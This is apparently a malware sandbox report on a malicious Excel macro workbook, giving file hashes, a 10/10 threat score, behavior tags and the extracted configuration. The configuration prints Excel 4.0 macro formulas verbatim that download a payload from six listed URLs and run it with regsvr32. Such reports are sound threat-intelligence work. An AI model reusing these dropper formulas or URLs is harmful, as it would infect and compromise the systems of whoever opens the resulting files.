Overview

overview

10

Static

static

10

1a440a4f6d...3.xlsm

windows7-x64

10

1a440a4f6d...3.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    1a440a4f6ddae2e450a5cad8967993839b8bd70dbc525e0d5ab1620266c2dc53

  • Size

    40KB

  • Sample

    241120-xa5grasakm

  • MD5

    efc25e011f5fbefa0395cf751d193831

  • SHA1

    4095c138a07dca840c8c6ee99eef29b9c5c6f1e0

  • SHA256

    1a440a4f6ddae2e450a5cad8967993839b8bd70dbc525e0d5ab1620266c2dc53

  • SHA512

    413aee74aa79f7a9efa1246a98fb7b5b5ae082e75bf4af355ae0ff468a3226241e1a0c580e06c3685c023b50fe3eaf8566186b6ccba37212e2ba07e3c4a4d956

  • SSDEEP

    768:lqoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:TOom8eDGylND59V4jwmXc2CVfIb

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://asempaye.com/404/zREXldL8ZfpsEepiC/

https://freesoft18.com/urq/dd1s9WyDLkdM/

https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/

https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/

https://pedroribeiro.work/wp-admin/qOkQQ/

https://hojeemdia.life/detector/klwHgC9eat/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://asempaye.com/404/zREXldL8ZfpsEepiC/","..\dan.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freesoft18.com/urq/dd1s9WyDLkdM/","..\dan.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/","..\dan.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/","..\dan.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pedroribeiro.work/wp-admin/qOkQQ/","..\dan.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hojeemdia.life/detector/klwHgC9eat/","..\dan.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dan.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://asempaye.com/404/zREXldL8ZfpsEepiC/
xlm40.dropper

https://freesoft18.com/urq/dd1s9WyDLkdM/
xlm40.dropper

https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/
xlm40.dropper

https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/
xlm40.dropper

https://pedroribeiro.work/wp-admin/qOkQQ/
xlm40.dropper

https://hojeemdia.life/detector/klwHgC9eat/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://asempaye.com/404/zREXldL8ZfpsEepiC/

Targets

    • Target

      1a440a4f6ddae2e450a5cad8967993839b8bd70dbc525e0d5ab1620266c2dc53

    • Size

      40KB

    • MD5

      efc25e011f5fbefa0395cf751d193831

    • SHA1

      4095c138a07dca840c8c6ee99eef29b9c5c6f1e0

    • SHA256

      1a440a4f6ddae2e450a5cad8967993839b8bd70dbc525e0d5ab1620266c2dc53

    • SHA512

      413aee74aa79f7a9efa1246a98fb7b5b5ae082e75bf4af355ae0ff468a3226241e1a0c580e06c3685c023b50fe3eaf8566186b6ccba37212e2ba07e3c4a4d956

    • SSDEEP

      768:lqoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:TOom8eDGylND59V4jwmXc2CVfIb

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks